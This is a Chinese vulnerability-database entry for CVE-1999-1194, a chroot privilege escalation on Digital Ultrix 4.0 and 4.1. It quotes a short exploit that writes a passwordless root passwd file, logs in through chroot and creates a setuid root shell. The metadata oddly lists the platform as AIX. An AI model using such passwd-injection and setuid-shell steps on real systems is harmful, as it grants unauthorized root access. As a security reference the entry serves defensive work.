Digital Ultrix chroot提升特权漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105236 漏洞类型 未知
发布时间 1991-05-01 更新时间 2005-05-02
CVE编号 CVE-1999-1194 CNNVD-ID CNNVD-199105-001
漏洞平台 AIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199105-001
|漏洞详情
DigitalUltrix4.1和4.0版本中的chroot被不安全安装,本地用户可以提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.
|参考资料

来源:CERT/CCAdvisory:CA-1991-05
名称:CA-1991-05
链接:http://www.cert.org/advisories/CA-1991-05.html
来源:XF
名称:dec-chroot(577)
链接:http://xforce.iss.net/static/577.php
来源:BID
名称:17
链接:http://www.securityfocus.com/bid/17